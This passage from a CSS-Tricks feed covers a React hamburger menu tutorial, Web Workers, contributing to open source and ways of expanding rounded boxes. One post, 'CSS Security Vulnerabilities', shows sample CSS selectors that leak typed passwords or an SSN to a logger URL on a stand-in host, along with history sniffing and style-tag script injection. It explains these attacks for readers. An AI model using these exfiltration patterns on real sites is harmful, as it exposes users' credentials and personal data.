Go to global.js and change the background and color properties to use our defined variables. This helps us implement a theme rather than using fixed values that are difficult to change.

// global.js
background: ${({ theme }) => theme.primaryDark};
color: ${({ theme }) => theme.primaryLight};

We destructure our theme from props. So, instead of writing props.theme each time, we just use a pair of curly braces. I’ll repeat myself: the theme is available because we’ve wrapped our global styles with ThemeProvider.

Create Burger and Menu components

Create a components folder inside the src directory and add two folders in there: Menu and Burger, plus an index.js file.

index.js will be used for one purpose: allow us to import components from one file, which is very handy, especially when you have a lot of them.

Now let’s create our components. Each folder will contain three files.

What’s up with all the files? You’ll see the benefit of a scalable structure soon enough. It worked well for me in a couple of projects, but here is some good advice on how to create a scalable structure.

Go to the Burger folder and create Burger.js for our layout. Then add Burger.styled.js, which will contain styles, and index.js, which will be exporting the file.

// index.js
export { default } from './Burger';

Feel free to style the burger toggle any way you want, or just paste these styles:

// Burger.styled.js
import styled from 'styled-components';

export const StyledBurger = styled.button`
  position: absolute;
  top: 5%;
  left: 2rem;
  display: flex;
  flex-direction: column;
  justify-content: space-around;
  width: 2rem;
  height: 2rem;
  background: transparent;
  border: none;
  cursor: pointer;
  padding: 0;
  z-index: 10;

  &:focus {
    outline: none;
  }

  div {
    width: 2rem;
    height: 0.25rem;
    background: ${({ theme }) => theme.primaryLight};
    border-radius: 10px;
    transition: all 0.3s linear;
    position: relative;
    transform-origin: 1px;
  }
`;

The transform-origin property will be needed later to animate the burger icon as it toggles between open and closed states.

After adding the styles, go to Burger.js and add the layout:

// Burger.js
import React from 'react';
import { StyledBurger } from './Burger.styled';

const Burger = () => {
  return (
    <StyledBurger>
      <div />
      <div />
      <div />
    </StyledBurger>
  )
}

export default Burger;

After that, look at the top left corner. Do you see it?

Time to do the same with the Menu folder:

// Menu -> index.js
export { default } from './Menu';

// Menu.styled.js
import styled from 'styled-components';

export const StyledMenu = styled.nav`
  display: flex;
  flex-direction: column;
  justify-content: center;
  background: ${({ theme }) => theme.primaryLight};
  height: 100vh;
  text-align: left;
  padding: 2rem;
  position: absolute;
  top: 0;
  left: 0;
  transition: transform 0.3s ease-in-out;

  @media (max-width: ${({ theme }) => theme.mobile}) {
    width: 100%;
  }

  a {
    font-size: 2rem;
    text-transform: uppercase;
    padding: 2rem 0;
    font-weight: bold;
    letter-spacing: 0.5rem;
    color: ${({ theme }) => theme.primaryDark};
    text-decoration: none;
    transition: color 0.3s linear;

    @media (max-width: ${({ theme }) => theme.mobile}) {
      font-size: 1.5rem;
      text-align: center;
    }

    &:hover {
      color: ${({ theme }) => theme.primaryHover};
    }
  }
`;

Next, let’s add the layout for the menu items that are revealed when clicking on our burger:

// Menu.js
import React from 'react';
import { StyledMenu } from './Menu.styled';

const Menu = () => {
  return (
    <StyledMenu>
      <a href="/">
        <span role="img" aria-label="about us">💁🏻‍♂️</span>
        About us
      </a>
      <a href="/">
        <span role="img" aria-label="price">💸</span>
        Pricing
      </a>
      <a href="/">
        <span role="img" aria-label="contact">📩</span>
        Contact
      </a>
    </StyledMenu>
  )
}

export default Menu;

We’ve got nice emojis here, and best practice is to make them accessible by wrapping each one in a span and adding a couple of properties: role="img" and aria-label="your label". You can read more about it here.

Time to import our new components into our App.js file:

// App.js
import React from 'react';
import { ThemeProvider } from 'styled-components';
import { GlobalStyles } from './global';
import { theme } from './theme';
import { Burger, Menu } from './components';
// ...

Let’s see, what we’ve got:

Take a look at this nice navigation bar! But we’ve got one issue here: it’s open, and we want it to be closed initially. We only need to add one line to Menu.styled.js to fix it:

// Menu.styled.js
transform: translateX(-100%);

We are well on our way to calling this burger cooked! But first…

Adding open and close functionality

We want to open the sidebar when clicking the hamburger icon, so let’s get to it. Open App.js and add some state to it. We will use the useState hook for it.

// App.js
import React, { useState } from 'react';

After you import it, let’s use it inside the App component.

// App.js
const [open, setOpen] = useState(false);

We set the initial state to false, because our menu should be hidden when the application is rendered.

We need both our toggle and sidebar menu to know about the state, so pass it down as a prop to each component. Now your App.js should look something like this:

// App.js
import React, { useState } from 'react';
import { ThemeProvider } from 'styled-components';
import { GlobalStyles } from './global';
import { theme } from './theme';
import { Burger, Menu } from './components';

function App() {
  const [open, setOpen] = useState(false);

  return (
    <ThemeProvider theme={theme}>
      <>
        <GlobalStyles />
        <div>
          <h1>Hello. This is burger menu tutorial</h1>
          <img src="https://media.giphy.com/media/xTiTnwj1LUAw0RAfiU/giphy.gif" alt="animated burger" />
        </div>
        <div>
          <Burger open={open} setOpen={setOpen} />
          <Menu open={open} setOpen={setOpen} />
        </div>
      </>
    </ThemeProvider>
  );
}

export default App;

Notice that we’re wrapping our components in a div. This will be helpful later when we add functionality that closes the menu when clicking anywhere on the screen.

Handle props in the components

Our Burger and Menu know about the state, so all we need to do is to handle it inside and add styles accordingly. Go to Burger.js and handle the props that were passed down:

// Burger.js
import React from 'react';
import { bool, func } from 'prop-types';
import { StyledBurger } from './Burger.styled';

const Burger = ({ open, setOpen }) => {
  return (
    <StyledBurger open={open} onClick={() => setOpen(!open)}>
      <div />
      <div />
      <div />
    </StyledBurger>
  )
}

Burger.propTypes = {
  open: bool.isRequired,
  setOpen: func.isRequired,
};

export default Burger;

We destructure the open and setOpen props and pass them to our StyledBurger to add styles for each prop, respectively. Also, we add the onClick handler to call our setOpen function and toggle open prop. At the end of the file, we add type checking, which is considered a best practice for aligning arguments with expected data.

You can check whether it works or not by going to React Developer Tools. Go to the Components tab in your Chrome DevTools and click on the Burger tab.

Now, when you click on your Burger component, (don’t mix it up with the tab), you should see, that your open checkbox is changing its state.

Go to Menu.js and do almost the same, although here we pass only the open prop:

// Menu.js
import React from 'react';
import { bool } from 'prop-types';
import { StyledMenu } from './Menu.styled';

const Menu = ({ open }) => {
  return (
    <StyledMenu open={open}>
      <a href="/">
        <span role="img" aria-label="about us">💁🏻‍♂️</span>
        About us
      </a>
      <a href="/">
        <span role="img" aria-label="price">💸</span>
        Pricing
      </a>
      <a href="/">
        <span role="img" aria-label="contact">📩</span>
        Contact
      </a>
    </StyledMenu>
  )
}

Menu.propTypes = {
  open: bool.isRequired,
}

export default Menu;

The next step is to pass the open prop down to our styled component so we can apply the transition. Open Menu.styled.js and add the following to our transform property:

transform: ${({ open }) => open ? 'translateX(0)' : 'translateX(-100%)'};

This is checking if our styled component open prop is true, and if so, it adds translateX(0) to move our navigation back on the screen. You can already test it out locally!

Wait, wait, wait!

Did you notice something wrong when checking things out? Our Burger has the same color as the background color of our Menu, which makes them blend together. Let’s change that and also animate the icon a bit to make it more interesting. We’ve got the open prop passed to it, so we can use that to apply the changes.

Open Burger.styled.js and write the following:

// Burger.styled.js
import styled from 'styled-components';

export const StyledBurger = styled.button`
  position: absolute;
  top: 5%;
  left: 2rem;
  display: flex;
  flex-direction: column;
  justify-content: space-around;
  width: 2rem;
  height: 2rem;
  background: transparent;
  border: none;
  cursor: pointer;
  padding: 0;
  z-index: 10;

  &:focus {
    outline: none;
  }

  div {
    width: 2rem;
    height: 0.25rem;
    background: ${({ theme, open }) => open ? theme.primaryDark : theme.primaryLight};
    border-radius: 10px;
    transition: all 0.3s linear;
    position: relative;
    transform-origin: 1px;

    :first-child {
      transform: ${({ open }) => open ? 'rotate(45deg)' : 'rotate(0)'};
    }

    :nth-child(2) {
      opacity: ${({ open }) => open ? '0' : '1'};
      transform: ${({ open }) => open ? 'translateX(20px)' : 'translateX(0)'};
    }

    :nth-child(3) {
      transform: ${({ open }) => open ? 'rotate(-45deg)' : 'rotate(0)'};
    }
  }
`;

This is a big chunk of CSS, but it makes the animation magic happen. We check if the open prop is true and change styles accordingly. We rotate, translate, then hide the menu icon’s lines while changing color. Beautiful, isn’t it?

Okay, folks! By now, you should know how to create a simple hamburger icon and menu, that incorporates responsiveness and smooth animation. Congratulations!

But there’s one last thing we ought to account for...

Close the menu by clicking outside of it

This part seems like a small bonus, but it’s a big UX win because it allows the user to close the menu by clicking anywhere else on the page. This helps the user avoid having to re-locate the menu icon and clicking exactly on it.

We’re going to put more React hooks to use to make this happen! Create a file in the src directory, called hooks.js, and open it. For this one, we’re gonna turn to the useEffect hook, which was introduced in React 16.8.

// hooks.js
import { useEffect } from 'react';

Before we write the code, let’s think about the logic behind this hook. When we click somewhere on the page, we need to check whether the clicked element is our current element (in our case, that is the Menu component) or if the clicked element contains the current element (for instance, our div that wraps our menu and hamburger icon). If so, we don’t do anything, otherwise, we call a function, that we’ll name handler.

We are going to use ref to check the clicked element, and we will do so every time someone clicks on the page.

// hooks.js
import { useEffect } from 'react';

export const useOnClickOutside = (ref, handler) => {
  useEffect(() => {
    const listener = event => {
      if (!ref.current || ref.current.contains(event.target)) {
        return;
      }
      handler(event);
    };
    document.addEventListener('mousedown', listener);
    return () => {
      document.removeEventListener('mousedown', listener);
    };
  }, [ref, handler]);
};

Don’t forget to return the function from useEffect. That’s the so-called "clean up" and, basically, it removes the event listener when the component unmounts. It’s the hooks replacement for the componentWillUnmount lifecycle method.

Now let’s hook up the hook

We’ve got our hook ready, so it’s time to add it to the app. Go to the App.js file, and import two hooks: the newly created useOnClickOutside and also useRef. We’ll need the latter to get a reference to the element.

// App.js
import React, { useState, useRef } from 'react';
import { useOnClickOutside } from './hooks';

To check the clicked element against the current element, we need access to the DOM node. That’s where we use useRef; also, the name node perfectly reflects the point of this variable.

From there, we pass the node as a first argument. We’ll pass the function that closes our menu as a second argument.

// App.js
const node = useRef();
useOnClickOutside(node, () => setOpen(false));

Lastly, we need to pass our ref to the DOM element. In our case, it will be div, that holds the Burger and Menu components:

// App.js
<div ref={node}>
  <Burger open={open} setOpen={setOpen} />
  <Menu open={open} setOpen={setOpen} />
</div>

Your App.js should look similar to this:

// App.js
import React, { useState, useRef } from 'react';
import { ThemeProvider } from 'styled-components';
import { useOnClickOutside } from './hooks';
import { GlobalStyles } from './global';
import { theme } from './theme';
import { Burger, Menu } from './components';

function App() {
  const [open, setOpen] = useState(false);
  const node = useRef();
  useOnClickOutside(node, () => setOpen(false));

  return (
    <ThemeProvider theme={theme}>
      <>
        <GlobalStyles />
        <div>
          <h1>Hello. This is burger menu tutorial</h1>
          <img src="https://media.giphy.com/media/xTiTnwj1LUAw0RAfiU/giphy.gif" alt="animated burger" />
        </div>
        <div ref={node}>
          <Burger open={open} setOpen={setOpen} />
          <Menu open={open} setOpen={setOpen} />
        </div>
      </>
    </ThemeProvider>
  );
}

export default App;

Check this out! It works as expected, and it’s fully functional and responsive.

Congratulations, everyone! You did a great job! Happy coding!

View on GitHub

The post Hamburger Menu with a Side of React Hooks and Styled Components appeared first on CSS-Tricks.

“Off The Main Thread”

CSS-Tricks - Tue, 09/10/2019 - 4:33am

JavaScript is what they call "single-threaded." As Brian Barbour puts it:

This means it has one call stack and one memory heap.

We all feel a symptom of that regularly in the form of performance jank and non-interactivity on elements or entire sites. If we give JavaScript lots of jobs and it gets really busy doing them, then it's not doing other things, like, say, handling our event handlers quickly.

There has been an interesting point/counter-point combo recently along these lines.

Das Surma has been advocating for moving as much JavaScript off the main thread as you possibly can. In fact, when it comes to using Web Workers, he suggests:

You should always use Web Workers.

Web Workers being the primary way to run JavaScript off the main thread.

There is lots to consider, of course, but I like how he compares this to how other languages call the main thread the "UI thread." If what you are doing is UI-related, do it on the main thread; if it's not, do it off the main thread. An example? State management.

David Gilbertson must have read that and wrote:

I saw an article recently making the case that updating a Redux store was a good candidate for Web Workers because it’s not UI work (and non-UI work doesn’t belong on the main thread). Chucking the data processing over to a worker thread sounds sensible, but the idea struck me as a little, umm, academic.

David's main point, it seems to me, is that some of the hefty JavaScript things we need to do are in response to user-initiated actions where the user needs to wait for things to finish anyway, so an unresponsive UI during that time is OK. But for anything that isn't user-initiated — and takes longer than say 100ms — he agrees a Web Worker is helpful.

(Looking at that 100ms thing, it's worth noting that a major point Das Surma is making is that the world is full of low-end phones — and who knows what 100ms on a high-end phone is when translated to on a low-end phone.)
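To make "off the main thread" concrete, here's a minimal Web Worker sketch (the file names and the bigChunkOfData, render, and processData names are made up for illustration):

// main.js — hand heavy work to a worker so the UI thread stays responsive
const worker = new Worker('worker.js');

worker.postMessage(bigChunkOfData);  // bigChunkOfData is a stand-in
worker.onmessage = (event) => {
  render(event.data);                // UI work belongs back on the main thread
};

// worker.js — runs on its own thread
onmessage = (event) => {
  const result = processData(event.data); // stand-in for the heavy, non-UI work
  postMessage(result);
};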

The post “Off The Main Thread” appeared first on CSS-Tricks.

CSS Security Vulnerabilities

CSS-Tricks - Mon, 09/09/2019 - 11:32am

Don't read that headline and get worried. I don't think CSS is a particularly dangerous security concern and, for the most part, I don't think you need to worry about it.

But every once in a while, articles tend to circulate and get some attention as to the possibilities of what CSS can do that might surprise or worry you.

Here's a little roundup.

The Visited Link Concern

This one goes like this:

  1. You put a link to a particular page on your site, say <a href="https://i-tickle-pigs.com">Tickle Pigs</a>
  2. You style the visited state of that link like a:visited { color: pink; } which is not a default user agent style.
  3. You test the computed style of that link.
  4. If it's pink, this user is a pig tickler.
  5. You report that pig tickling information back to some server somewhere and presumably triple their pig owning insurance rates as surely the pigs will suffer extreme emotional distress over all the tickling.

You might even be able to do it entirely in CSS, because that :visited style might have like background-image: url(/data-logger/tickle.php); which is only requested by pig ticklers.
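Spelled out as a complete rule, the CSS-only version of this thought experiment would look something like the following (a hypothetical snippet, reusing the pig-tickling example above):

/* hypothetical: the background request would only fire
   for users who have this link in their history */
a[href="https://i-tickle-pigs.com"]:visited {
  background-image: url(/data-logger/tickle.php);
}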

Worried? Don't be; browsers have all prevented this from being possible.

The Keylogger

This one goes like this:

  1. There is an input on the page. Perhaps a password input. Scary!
  2. You put a logger script as the value for the input's background image, but also one billion more selectors just like that such that the logger will collect and report some or all of the password.
input[value^="a"] { background: url(logger.php?v=a); }

This one isn't that easy. The value attribute of an input doesn't change just because you type into it. It does sometimes in frameworks like React though, so if you were to slip this CSS onto a login page powered by React and coded in that way then, theoretically, this CSS-powered keylogger could work.

But... in that case, JavaScript is executing on that page anyway. JavaScript is 1000× more concerning than CSS for things like this. A keylogger in JavaScript is just a couple of lines of code watching for keypress events and reporting them via Ajax.

Third-party and XSS injected inline JavaScript is now stoppable with Content Security Policy (CSP)... but so is CSS.
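For example, a response header along these lines (a minimal sketch; real policies usually list more sources) restricts both scripts and styles to your own origin:

Content-Security-Policy: script-src 'self'; style-src 'self'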

The Data Thief

This one goes like this:

  1. If I can get some of my nefarious CSS onto a page where you've authenticated into a site...
  2. And that site displays sensitive information like a social security number (SSN) in a pre-filled form...
  3. I can use attribute selectors to figure it out.
input#ssn[value="123-45-6789"] { background: url(https://secret-site.com/logger.php?ssn=123-45-6789); }

A billion selectors and you've covered all the possibilities!

The inline style block whoopsie

I don't know if I'd blame CSS for this necessarily, but imagine:

<style> ... Drop in some user-generated stuff ... </style>

Perhaps you're allowing the user some CSS customization there. That's an attack vector, as they could close that style tag, open a script tag, and write nefarious JavaScript.

I'm sure there are a bunch more

Got 'em? Share 'em.

Paint me a little skeptical of how terrified I should be about CSS security vulnerabilities. I don't wanna downplay security things too much (especially third-party concerns) because I'm not an expert and security is of the utmost importance, but at the same time, I've never once heard of CSS being the attack vector for anything outside of a thought exercise. Educate me!

The post CSS Security Vulnerabilities appeared first on CSS-Tricks.

How to Contribute to an Open Source Project

CSS-Tricks - Mon, 09/09/2019 - 4:10am

The following is going to get slightly opinionated and aims to guide someone on their journey into open source. As a prerequisite, you should have basic familiarity with the command line and Git. If you know the concepts and want to dive right into the step by step how-to guide, check out this part of the article.

Truly, there is no one way to contribute to an open source project, and to be involved often means more than code slinging. In this article, though, we’re going to focus on the nitty-gritty of contributing a pull request (PR) to someone else’s project on GitHub.

Let's set the stage...

You come across someone's project on GitHub and you love it! You may even decide to use it in your own project. But there’s one small thing you notice... it could be a bug. It could be an enhancement to what’s already there. Maybe you looked through the code and found a nice, optimized way of writing things that’s a little more legible, even something as small as an extra indentation in the code.

Here are some initial suggestions and instructions on where to go from here.

Look for a CONTRIBUTING.md document or Contributing Guide in the documentation

Many open source projects know that other people might want to contribute. If they find themselves answering the same question again and again, this document intends to make it easier to get everyone on the same page.

Some things you might find in a Contributing guide:

  • Style guidelines
  • Prerequisites for submitting a PR
  • How to add your change to their documentation
  • A checklist for contribution
  • Explaining the project’s architecture and setup

This document can be as simple as a few notes, or it can be so robust that it takes you a little while to read through it all (like Atom’s Contributing guide, for example).

For larger projects, it makes sense to communicate contributing guidelines up front because PRs and issues can pile up and be a real drag on a maintainer's time, sorting through contributions that might be out of the project's scope. Make sure to take some of your own time reading through this guide if it exists because your PR will require some of the maintainer's time as well.

Look through the existing issues and PRs

Before adding a new issue or submitting a PR, it’s good to check what else is out there. You might find someone has already asked about the same thing, or submitted something similar. You can check in the project's search box — I usually search through issues that are both open and closed, as it’s important to know if someone already raised my concern and perhaps the maintainer decided to go in another direction. Again, it's about saving both you and the maintainer time.

Submit an issue

Submitting issues is a core part of the PR submission process. They provide an opportunity to articulate the situation, establish context around it, and provide a forum for discussion that can be attached to the PR itself.

When submitting an issue, I like to write out what my concern is and then re-read it as if I were on the receiving end. People are human — even if what you say is technically correct, you’re not likely to get buy-in for your idea if your tone is off-putting. Consider this: you may be asking for someone to do a lot of work in their spare time. If someone asks you to do work on a Saturday, are you more likely to do so if they ask respectfully or with condescension? You get the picture.

When submitting an issue, make sure you give them all the details they need to get the work done. Some things you might note:

  • If it’s a bug, then what environment are you seeing the problem in? Is it development or production? Perhaps somewhere else?
  • If it’s a feature request, then explain the problem. Sometimes framing this from the perspective of the end user in the form of user stories can be helpful, both to conceptualize the situation and abstract it from any personal feelings.
  • If it’s a general question, then state that up front so the maintainer can avoid spending time trying to figure out if you’re asking for a bug or a feature.
  • If you’d like to submit a PR to improve on the issue, mention that you’d like to do this, then ask permission to proceed (because sometimes maintainers have other items planned you may be unaware of).
Make considerations before starting work

You're probably eager to start working on your PR by this point. But first, there are still a few customary things to check off before you dig in.

Ask first

I’m a big fan of people asking in an issue if a PR makes sense before they work on one. I don’t hold it as a strict rule, but sometimes I can save them buckets of time and going in the wrong direction if we can clarify what we both want together first. It also helps others know not to implement the same thing (assuming they, too, look through open and closed PRs).

Use labels

If you do submit an issue and everyone agrees a PR is a good idea, then it’s nice for you (or the owner of the repo) to add the label in progress. You can search labels so it’s really clear to everyone you’re working on it.

Work in small chunks!

As a maintainer, it’s frustrating when someone puts in a lot of work and submits a giant honking PR that does 10 different things. It’s really tough to review, and inevitably, they’re doing six things you want and four things you don’t. Not only that, it’s usually spread out over multiple files, which is difficult to untangle. I’ve definitely closed PRs containing some high-quality code I would have liked, just because it would take forever to review and manage. (I will communicate that this is the issue and invite them to resubmit the work as separate PRs, though.)

In my opinion, you have about 1,000% more chance of getting your PR merged and your time spent honored if you split things over multiple, smaller PRs. I love it when people submit a PR per topic. And it can be nice, though not required, if each submission is a little spaced out as well to help with the cognitive overload.

Submit your PR

These are the steps I personally use to submit a PR. You can get this done other ways, of course, but I have found the following to be effective in my experiences. Also, anything in the commands that are written in ALL CAPS is information you will need to change for your use.

First off, go to the repo, and fork a copy of the project to your personal GitHub account. Clone it locally and change directory (cd) to where it's located. (I use HTTPS, but SSH is totally fine as well.)

git clone https://github.com/YOUR-USERNAME/YOUR-FORKED-REPO.git
cd into/cloned/fork-repo

Next up, add a remote upstream to the original branch. This means it will share a connection with that original branch so that you can keep in sync and pull down any updates to the project when they happen.

git remote add upstream https://github.com/ORIGINAL-DEV-USERNAME/REPO-YOU-FORKED-FROM.git
git fetch upstream

Now you can create a new branch and give it a name that relates to the PR topic. Note that a maintainer might have a specific naming convention in mind that is documented in the repo.

git checkout -b GOOD-FORKIN-NAME

Go forth and work on your changes. Be sure to make good commit messages along the way:

git add -A
git commit -m "ADDING IN A TACO DISPENSER"
git push origin GOOD-FORKIN-NAME

GitHub will see the new fork and prompt you to make the PR, which is a nice, helpful touch. You click the button and fill in the details: what issue does it close? You can refer to issues by their number (e.g., "Closes #42") and GitHub will automatically associate them:

On the PR: (screenshot of the PR description referencing the issue number)

In the Issue: (screenshot of the issue showing the linked PR)

What are some of the things to note in the PR? These details help the maintainer understand context: they can be a rundown of all the changes you made, or the larger strategy behind them.

And you’re on your way! 🎉

You may find you need to keep your fork up-to-date with the remote, and pull their changes into yours. To do so, you would run this command:

git pull upstream master

Props to Christina Solana for her Gist which I’ve used as a reference for years and years now.

Always remember: maintainers are often swamped, sacrificing nights and weekends to keep open source projects active and updated. Being respectful, both in terms of their time, and in tone, can set you up for success in contributing.

Open source can be extremely rewarding! Knowing other people are benefitting and directly using something you contributed can be a great way to give back to the community and learn.

The post How to Contribute to an Open Source Project appeared first on CSS-Tricks.

Various Methods for Expanding a Box While Preserving the Border Radius

Css Tricks - Fri, 09/06/2019 - 4:19am

I've recently noticed an interesting change on CodePen: on hovering the pens on the homepage, there's a rectangle with rounded corners expanding in the back.

Expanding box effect on the CodePen homepage.

Being the curious creature that I am, I had to check how this works! Turns out, the rectangle in the back is an absolutely positioned ::after pseudo-element.

Initial ::after styles. A positive offset goes inwards from the parent's padding limit, while a negative one goes outwards.

On :hover, its offsets are overridden and, combined with the transition, we get the expanding box effect.

The ::after styles on :hover.

The right property has the same value (-1rem) in both the initial and the :hover rule sets, so it's unnecessary to override it, but all the other offsets move by 2rem outwards (from 1rem to -1rem for the top and left offsets and from -1rem to -3rem for the bottom offset).

One thing to notice here is that the ::after pseudo-element has a border-radius of 10px which gets preserved as it expands. Which got me to think about what methods we have for expanding/shrinking (pseudo-) elements while preserving their border-radius. How many can you think of? Let me know if you have ideas that haven't been included below, where we take a look at a bunch of options and see which is best suited for what situation.

Changing offsets

This is the method used on CodePen and it works really well in this particular situation for a bunch of reasons. First off, it has great support. It also works when the expanding (pseudo-) element is responsive, with no fixed dimensions and, at the same time, the amount by which it expands is fixed (a rem value). It also works for expanding in more than two directions (top, bottom and left in this particular case).

There are however a couple of caveats we need to be aware of.

First, our expanding element cannot have position: static. This is not a problem in the context of the CodePen use case since the ::after pseudo-element needs to be absolutely positioned anyway in order to be placed underneath the rest of this parent's content.

Second, going overboard with offset animations (or, in general, animating any property that affects layout, the way offsets, margins, border widths, paddings and dimensions do) can negatively impact performance. Again, this is not something of concern here; we only have a little transition on :hover, no big deal.

Changing dimensions

Instead of changing offsets, we could change dimensions. However, this is a method that works if we want our (pseudo-) element to expand in, at most, two directions. Otherwise, we need to change offsets as well. In order to better understand this, let's consider the CodePen situation where we want our ::after pseudo-elements to expand in three directions (top, bottom and left).

The relevant initial sizing info is the following:

.single-item::after {
  top: 1rem;
  right: -1rem;
  bottom: -1rem;
  left: 1rem;
}

Since opposing offsets (the top-bottom and left-right pairs) cancel each other (1rem - 1rem = 0), it results that the pseudo-element's dimensions are equal to those of its parent (or 100% of the parent's dimensions).

So we can re-write the above as:

.single-item::after {
  top: 1rem;
  right: -1rem;
  width: 100%;
  height: 100%;
}

On :hover, we increase the width by 2rem to the left and the height by 4rem, 2rem to the top and 2rem to the bottom. However, just writing:

.single-item::after {
  width: calc(100% + 2rem);
  height: calc(100% + 4rem);
}

...is not enough, as this makes the height increase in the downward direction by 4rem instead of increasing it by 2rem up and 2rem down. The following demo illustrates this (put :focus on or hover over the items to see how the ::after pseudo-element expands):

See the Pen by thebabydino (@thebabydino) on CodePen.

We'd need to update the top property as well in order to get the desired effect:

.single-item::after {
  top: -1rem;
  width: calc(100% + 2rem);
  height: calc(100% + 4rem);
}

Which works, as it can be seen below:

See the Pen by thebabydino (@thebabydino) on CodePen.

But, to be honest, this feels less desirable than changing offsets alone.

However, changing dimensions is a good solution in a different kind of situation, like when we want to have some bars with rounded corners that expand/shrink in a single direction.

See the Pen by thebabydino (@thebabydino) on CodePen.

Note that, if we didn't have rounded corners to preserve, the better solution would be to use directional scaling via the transform property.

Changing padding/border-width

Similar to changing the dimensions, we can change the padding or border-width (for a border that's transparent). Note that, just like with changing the dimensions, we also need to update offsets if expanding the box in more than two directions:

See the Pen by thebabydino (@thebabydino) on CodePen.

In the demo above, the pinkish box represents the content-box of the ::after pseudo-element and you can see it stays the same size, which is important for this approach.

In order to understand why that's important, consider this other limitation: we also need to have the box dimensions defined by two offsets plus the width and the height instead of using all four offsets. This is because the padding/border-width would only grow inwards if we were to use four offsets rather than two plus the width and the height.

See the Pen by thebabydino (@thebabydino) on CodePen.

For the same reason, we cannot have box-sizing: border-box on our ::after pseudo-element.

See the Pen by thebabydino (@thebabydino) on CodePen.

In spite of these limitations, this method can come in handy if our expanding (pseudo-) element has text content we don't want to see moving around on :hover, as illustrated by the Pen below, where the first two examples change offsets/dimensions, while the last two change paddings/border widths:

See the Pen by thebabydino (@thebabydino) on CodePen.

Changing margin

Using this method, we first set the offsets to the :hover state values and a margin to compensate and give us the initial state sizing:

.single-item::after {
  top: -1rem;
  right: -1rem;
  bottom: -3rem;
  left: -1rem;
  margin: 2rem 0 2rem 2rem;
}

Then we zero this margin on :hover:

.single-item:hover::after { margin: 0 }

See the Pen by thebabydino (@thebabydino) on CodePen.

This is another approach that works great for the CodePen situation, though I cannot really think of other use cases. Also note that, just like changing offsets or dimensions, this method affects the size of the content-box, so any text content we may have gets moved and rearranged.

Changing font size

This is probably the trickiest one of all and has lots of limitations, the most important of which being we cannot have text content on the actual (pseudo-) element that expands/shrinks — but it's another method that would work well in the CodePen case.

Also, font-size on its own doesn't really do anything to make a box expand or shrink. We need to combine it with one of the previously discussed properties.

For example, we can set the font-size on ::after to be equal to 1rem, set the offsets to the expanded case and set em margins that would correspond to the difference between the expanded and the initial state.

.single-item::after {
  top: -1rem;
  right: -1rem;
  bottom: -3rem;
  left: -1rem;
  margin: 2em 0 2em 2em;
  font-size: 1rem;
}

Then, on :hover, we bring the font-size to 0:

.single-item:hover::after { font-size: 0 }

See the Pen by thebabydino (@thebabydino) on CodePen.

We can also use font-size with offsets, though it gets a bit more complicated:

.single-item::after {
  top: calc(2em - 1rem);
  right: -1rem;
  bottom: calc(2em - 3rem);
  left: calc(2em - 1rem);
  font-size: 1rem;
}

.single-item:hover::after { font-size: 0 }

Still, what's important is that it works, as it can be seen below:

See the Pen by thebabydino (@thebabydino) on CodePen.

Combining font-size with dimensions is even hairier, as we also need to change the vertical offset value on :hover on top of everything:

.single-item::after {
  top: 1rem;
  right: -1rem;
  width: calc(100% + 2em);
  height: calc(100% + 4em);
  font-size: 0;
}

.single-item:hover::after {
  top: -1rem;
  font-size: 1rem
}

Oh, well, at least it works:

See the Pen by thebabydino (@thebabydino) on CodePen.

Same thing goes for using font-size with padding/border-width:

.single-item::after {
  top: 1rem;
  right: -1rem;
  width: 100%;
  height: 100%;
  font-size: 0;
}

.single-item:nth-child(1)::after {
  padding: 2em 0 2em 2em;
}

.single-item:nth-child(2)::after {
  border: solid 0 transparent;
  border-width: 2em 0 2em 2em;
}

.single-item:hover::after {
  top: -1rem;
  font-size: 1rem;
}

See the Pen by thebabydino (@thebabydino) on CodePen.

Changing scale

If you've read pieces on animation performance, then you've probably read it's better to animate transforms instead of properties that impact layout, like offsets, margins, borders, paddings, dimensions — pretty much what we've used so far!

The first issue that stands out here is that scaling an element also scales its corner rounding, as illustrated below:

See the Pen by thebabydino (@thebabydino) on CodePen.

We can get around this by also scaling the border-radius the other way.

Let's say we scale an element by a factor $fx along the x axis and by a factor $fy along the y axis and we want to keep its border-radius at a constant value $r.

This means we also need to divide $r by the corresponding scaling factor along each axis.

border-radius: #{$r/$fx}/ #{$r/$fy};
transform: scale($fx, $fy)

See the Pen by thebabydino (@thebabydino) on CodePen.

However, note that with this method, we need to use scaling factors, not amounts by which we expand our (pseudo-) element in this or that direction. Getting the scaling factors from the dimensions and expansion amounts is possible, but only if they're expressed in units that have a certain fixed relation between them. While preprocessors can mix units like in or px due to the fact that 1in is always 96px, they cannot resolve how much 1em or 1% or 1vmin or 1ch is in px as they lack context. And calc() is not a solution either, as it doesn't allow us to divide a length value by another length value to get a unitless scale factor.

This is why scaling is not a solution in the CodePen case, where the ::after boxes have dimensions that depend on the viewport and, at the same time, expand by fixed rem amounts.

But if our scale amount is given or we can easily compute it, this is an option to consider, especially since making the scaling factors custom properties we then animate with a bit of Houdini magic can greatly simplify our code.

border-radius: calc(#{$r}/var(--fx))/ calc(#{$r}/var(--fy));
transform: scale(var(--fx), var(--fy))

Note that Houdini only works in Chromium browsers with the Experimental Web Platform features flag enabled.

For example, we can create this tile grid animation:

Looping tile grid animation (Demo, Chrome with flag only)

The square tiles have an edge length $l and a corner rounding $r equal to $k*$l:

.tile {
  width: $l;
  height: $l;
  border-radius: calc(#{$r}/var(--fx))/ calc(#{$r}/var(--fy));
  transform: scale(var(--fx), var(--fy))
}

We register our two custom properties:

CSS.registerProperty({
  name: '--fx',
  syntax: '<number>',
  initialValue: 1,
  inherits: false
});

CSS.registerProperty({
  name: '--fy',
  syntax: '<number>',
  initialValue: 1,
  inherits: false
});

And we can then animate them:

.tile {
  /* same as before */
  animation: a $t infinite ease-in alternate;
  animation-name: fx, fy;
}

@keyframes fx {
  0%, 35% { --fx: 1 }
  50%, 100% { --fx: #{2*$k} }
}

@keyframes fy {
  0%, 35% { --fy: 1 }
  50%, 100% { --fy: #{2*$k} }
}

Finally, we add in a delay depending on the horizontal (--i) and vertical (--j) grid indices in order to create a staggered animation effect:

animation-delay:
  calc((var(--i) + var(--m) - var(--j))*#{$t}/(2*var(--m)) - #{$t}),
  calc((var(--i) + var(--m) - var(--j))*#{$t}/(2*var(--m)) - #{1.5*$t})

Another example is the following one, where the dots are created with the help of pseudo-elements:

Looping spikes animation (Demo, Chrome with flag only)

Since pseudo-elements get scaled together with their parents, we need to also reverse the scaling transform on them:

.spike {
  /* other spike styles */
  transform: var(--position) scalex(var(--fx));

  &::before, &::after {
    /* other pseudo styles */
    transform: scalex(calc(1/var(--fx)));
  }
}

Changing... clip-path?!

